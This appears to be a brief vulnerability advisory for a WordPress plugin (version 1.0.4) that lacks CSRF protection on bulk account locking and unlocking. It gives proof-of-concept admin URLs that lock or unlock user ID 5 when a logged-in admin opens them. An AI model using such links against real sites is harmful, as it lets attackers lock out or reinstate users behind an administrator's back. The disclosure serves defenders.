Description The plugin does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack
Make a logged in admin open one of the links below, this will make them lock/unlock the user with ID 5 https://example.com/wp-admin/users.php?action=lock&action2;=lock&users;[0]=5 https://example.com/wp-admin/users.php?action=unlock&action2;=unlock&users;[0]=5
CPE | Name | Operator | Version |
---|---|---|---|
eq | 1.0.4 |